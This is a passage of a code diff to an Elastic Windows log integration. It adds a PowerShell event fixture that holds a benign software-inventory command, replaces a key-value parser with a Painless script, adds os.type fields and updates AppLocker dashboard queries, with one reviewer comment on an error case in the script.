"$str", + "=", + "$str.Substring(1,", + "$str.length", + "-", + "2)\n", + "}\n", + "$str", 
+ "=", + "$str.Replace('\\',", + "'\\\\')\n", + "$str", + "=", + "$str.Replace('', '\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=PSChildName;e={$_.PSChildName}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=Name;e={$_.DisplayName}},\n\t@{n=PackageId;e={$_.PSChildName}}, @{n=Version;e={$_.DisplayVersion}}, Publisher,\n\t@{n=InstalledTime;e={[datetime]::ParseExact($_.InstallDate,yyyyMMdd,$null).ToUniversalTime().ToString(yyyy-MM-ddTHH:mm:ssZ)}} | % { [Console]::WriteLine(@\n{Name:$(Clean-Quotes-Backslash $_.Name),PackageId:$($_.PackageId),Version:$(Clean-Quotes-Backslash $_.Version),Publisher:$(Clean-Quotes-Backslash $_.Publisher),InstalledTime:$($_.InstalledTime)},\n@)}" + ], + "args_count": 118, + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t$Guid= $Guid.Replace('-', 
'').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and 
$products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)}", + "entity_id": "00654153-46ad-42bf-ad06-3bfce5c65b55", + "title": "ConsoleHost" + }, + "winlog": { + "api": "wineventlog", + "channel": "Windows PowerShell", + "computer_name": "foo", + "event_id": "600", + "keywords": [ + "Classic" + ], + "opcode": "Info", + "provider_name": "PowerShell", + "record_id": "67086", + "task": "Provider Lifecycle" + } } ] } \ No newline at end of file diff --git a/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml b/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml index e9afc6de1e5..9c88c7b8b13 100644 --- a/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml +++ b/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml 
@@ -10,15 +10,37 @@ processors: trim_value: "\n\t" value_split: "=" if: ctx?.winlog?.event_id == "800" - - kv: - description: Split Events 4xx and 600 event data fields. - field: winlog.event_data.param3 - target_field: winlog.event_data - field_split: "\n\t" - trim_key: "\n\t" - trim_value: "\n\t" - value_split: "=" - if: ctx?.winlog?.event_id != "800" + - script: + description: |- + Split Events 4xx and 600 event data fields. + Some events can contain multiline values containing also '\n', '\s', and '=' characters, + for this reason a simple KV processor is not reliable enough and we need a more specific parsing. + lang: painless + if: ctx.winlog?.event_id != "800" && ctx.winlog?.event_data?.param3 != null + params: + field: param3 + source: |- + def p = ctx.winlog?.event_data[params["field"]]; + // Define the pattern that will match all keys + def pat = /(^|(^[\n]?))?\t([^\s\W]+)=/m; + def m = pat.matcher(p); + + // we position ourselves in the first matching key + m.find(); + def key = m.group(3).trim(); + def previousEnd = m.end(); + + // while new keys are found, we add everything between one key and the next + // as the value, regardless of its contents + while(m.find()) + { + ctx.winlog.event_data[key] = p.substring(previousEnd, m.start()).trim(); + previousEnd = m.end(); + key = m.group(3).trim(); + } + + // add remaining value + ctx.winlog.event_data[key] = p.substring(previousEnd).trim(); ## ECS and Event fields. diff --git a/packages/windows/data_stream/powershell/fields/agent.yml b/packages/windows/data_stream/powershell/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/powershell/fields/agent.yml +++ b/packages/windows/data_stream/powershell/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type 
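Review bot: The first `m.find()` in the script source is unchecked, so a `param3` value containing no `\t<word>=` key (the `if` only rules out a null field) makes `m.group(3)` throw and the document is rejected by the pipeline instead of being indexed with the field left unparsed; replace the bare `m.find();` with `if (!m.find()) { return; }`. Unless a pipeline-level `on_failure` exists outside this hunk, that rejection means lost PowerShell audit visibility for exactly the malformed events a defender would want to keep. The key class `[^\s\W]+` is equivalent to `\w+`, so `\t(\w+)=` reads more plainly. It is also worth stating in the `description` that a value which itself contains a newline-tab-`word=` sequence is split into an extra key, since that is an inherent limit of this approach as it was of the kv processor it replaces.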
diff --git a/packages/windows/data_stream/powershell/manifest.yml b/packages/windows/data_stream/powershell/manifest.yml index c17b2d9ca27..d6336f08dea 100644 --- a/packages/windows/data_stream/powershell/manifest.yml +++ b/packages/windows/data_stream/powershell/manifest.yml @@ -60,6 +60,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -70,7 +71,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows Powershell Events via Splunk Enterprise REST API description: Collect Powershell Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/powershell_operational/fields/agent.yml b/packages/windows/data_stream/powershell_operational/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/powershell_operational/fields/agent.yml +++ b/packages/windows/data_stream/powershell_operational/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/powershell_operational/manifest.yml b/packages/windows/data_stream/powershell_operational/manifest.yml index 5800753a50f..21b4bc93f6c 100644 --- a/packages/windows/data_stream/powershell_operational/manifest.yml +++ b/packages/windows/data_stream/powershell_operational/manifest.yml 
@@ -60,6 +60,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -70,7 +71,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows Powershell Operational Events via Splunk Enterprise REST API description: Collect Powershell Operational Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/service/fields/agent.yml b/packages/windows/data_stream/service/fields/agent.yml index 0aca68da6ed..559419f0483 100644 --- a/packages/windows/data_stream/service/fields/agent.yml +++ b/packages/windows/data_stream/service/fields/agent.yml @@ -63,6 +63,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/sysmon_operational/fields/agent.yml b/packages/windows/data_stream/sysmon_operational/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/sysmon_operational/fields/agent.yml +++ b/packages/windows/data_stream/sysmon_operational/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/sysmon_operational/manifest.yml b/packages/windows/data_stream/sysmon_operational/manifest.yml index a7f85831a81..a92ec651a46 100644 --- a/packages/windows/data_stream/sysmon_operational/manifest.yml +++ b/packages/windows/data_stream/sysmon_operational/manifest.yml 
@@ -51,6 +51,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -61,7 +62,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows Sysmon Operational Events via Splunk Enterprise REST API description: Collect Sysmon Operational Events via Splunk Enterprise REST API diff --git a/packages/windows/docs/README.md b/packages/windows/docs/README.md index 649b37d62fc..426ea19070d 100644 --- a/packages/windows/docs/README.md +++ b/packages/windows/docs/README.md @@ -274,6 +274,7 @@ An example event for `applocker_exe_and_dll` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -653,6 +654,7 @@ An example event for `applocker_msi_and_script` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -1025,6 +1027,7 @@ An example event for `applocker_packaged_app_deployment` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -1398,6 +1401,7 @@ An example event for `applocker_packaged_app_execution` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -1746,6 +1750,7 @@ An example event for `powershell` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -2082,6 +2087,7 @@ An example event for `powershell_operational` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -2505,6 +2511,7 @@ An example event for `sysmon_operational` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | 
@@ -2778,6 +2785,7 @@ The Windows `service` data stream provides service details. | host.os.name | Operating system name, without the version. | keyword | | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | | host.os.version | Operating system version as a raw string. | keyword | | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | | windows.service.display_name | The display name of the service. | keyword | | 
@@ -2834,6 +2842,7 @@ The Windows `perfmon` data stream provides performance counter values. | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | windows.perfmon.instance | Instance value. | keyword | diff --git a/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json b/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json index 5559f5b7dcd..1246bbcfe64 100644 --- a/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json +++ b/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json 
@@ -11,63 +11,114 @@ "meta": { "alias": "Audited Applications", "disabled": true, - "field": "event.code", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", "negate": false, "params": [ - "8003", - "8006", - "8021", - "8022", - "8023", - "8024", - "8027" - ], - "type": "phrases" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "8003" - } - }, - { - "match_phrase": { - "event.code": "8006" - } - }, - { - "match_phrase": { - "event.code": "8021" - } - }, - { - "match_phrase": { - "event.code": "8022" - } - }, - { - "match_phrase": { - "event.code": "8023" - } + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.code", + "index": "logs-*", + "key": "event.code", + "negate": false, + "params": [ + "8003", + "8006", + "8021", + "8022", + "8023", + "8024", + "8027" + ], + "type": "phrases", + "value": [ + "8003", + "8006", + "8021", + "8022", + "8023", + "8024", + "8027" + ] }, - { - "match_phrase": { - "event.code": "8024" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.code": "8003" + } + }, + { + "match_phrase": { + "event.code": "8006" + } + }, + { + "match_phrase": { + "event.code": "8021" + } + }, + { + "match_phrase": { + "event.code": "8022" + } + }, + { + "match_phrase": { + "event.code": "8023" + } + }, + { + "match_phrase": { + "event.code": "8024" + } + }, + { + "match_phrase": { + "event.code": "8027" + } + } + ] } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.provider", + "index": "logs-*", + "key": "event.provider", + "negate": false, + "params": [ + "Microsoft-Windows-AppLocker" + ], + "type": "phrases", + "value": [ + "Microsoft-Windows-AppLocker" + ] }, - { - "match_phrase": { - "event.code": "8027" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.provider": 
"Microsoft-Windows-AppLocker" + } + } + ] } } - ] - } - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -76,33 +127,79 @@ "meta": { "alias": "Blocked Applications", "disabled": true, - "field": "event.code", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "event.code", "negate": false, "params": [ - "8004", - "8007" - ], - "type": "phrases" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "8004" + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.code", + "index": "logs-*", + "key": "event.code", + "negate": false, + "params": [ + "8004", + "8007" + ], + "type": "phrases", + "value": [ + "8004", + "8007" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.code": "8004" + } + }, + { + "match_phrase": { + "event.code": "8007" + } + } + ] } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.provider", + "index": "logs-*", + "key": "event.provider", + "negate": false, + "params": [ + "Microsoft-Windows-AppLocker" + ], + "type": "phrases", + "value": [ + "Microsoft-Windows-AppLocker" + ] }, - { - "match_phrase": { - "event.code": "8007" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.provider": "Microsoft-Windows-AppLocker" + } + } + ] } } - ] - } - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} }, { "$state": { 
@@ -111,57 +208,107 @@ "meta": { "alias": "Allowed Applications", "disabled": true, - "field": "event.code", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", - "key": "event.code", "negate": false, "params": [ - "8002", - "8005", - "8020", - "8027", - "8037", - "8039" - ], - "type": "phrases" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "8002" - } - }, - { - "match_phrase": { - "event.code": "8005" - } - }, - { - "match_phrase": { - "event.code": "8020" - } - }, - { - "match_phrase": { - "event.code": "8027" - } + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.code", + "index": "logs-*", + "key": "event.code", + "negate": false, + "params": [ + "8002", + "8005", + "8020", + "8027", + "8037", + "8039" + ], + "type": "phrases", + "value": [ + "8002", + "8005", + "8020", + "8027", + "8037", + "8039" + ] }, - { - "match_phrase": { - "event.code": "8037" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.code": "8002" + } + }, + { + "match_phrase": { + "event.code": "8005" + } + }, + { + "match_phrase": { + "event.code": "8020" + } + }, + { + "match_phrase": { + "event.code": "8027" + } + }, + { + "match_phrase": { + "event.code": "8037" + } + }, + { + "match_phrase": { + "event.code": "8039" + } + } + ] } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.provider", + "index": "logs-*", + "key": "event.provider", + "negate": false, + "params": [ + "Microsoft-Windows-AppLocker" + ], + "type": "phrases", + "value": [ + "Microsoft-Windows-AppLocker" + ] }, - { - "match_phrase": { - "event.code": "8039" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.provider": "Microsoft-Windows-AppLocker" + } + } + ] } } - ] - } - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} } ], "query": { 
@@ -224,7 +371,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layerId": "1ba1f39a-5a90-4ab5-ad2d-a8a4762395e7", @@ -338,7 +485,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "color": "#54B399", @@ -505,7 +652,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#DA8B45", @@ -593,7 +740,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#E7664C", @@ -680,7 +827,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and not winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and not winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#E57D68", 
@@ -767,7 +914,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name: \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#DA8B45", @@ -854,7 +1001,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and not winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and not winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#D6BF57", @@ -953,7 +1100,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" " + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layers": [ @@ -1056,7 +1203,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" }, "visualization": { "axisTitlesVisibilitySettings": { 
@@ -1184,7 +1331,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1338,7 +1485,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1496,7 +1643,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1638,7 +1785,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and not winlog.user_data.RuleName : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and not winlog.user_data.RuleName : \"-\"" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1791,7 +1938,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" " + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "axisTitlesVisibilitySettings": { 
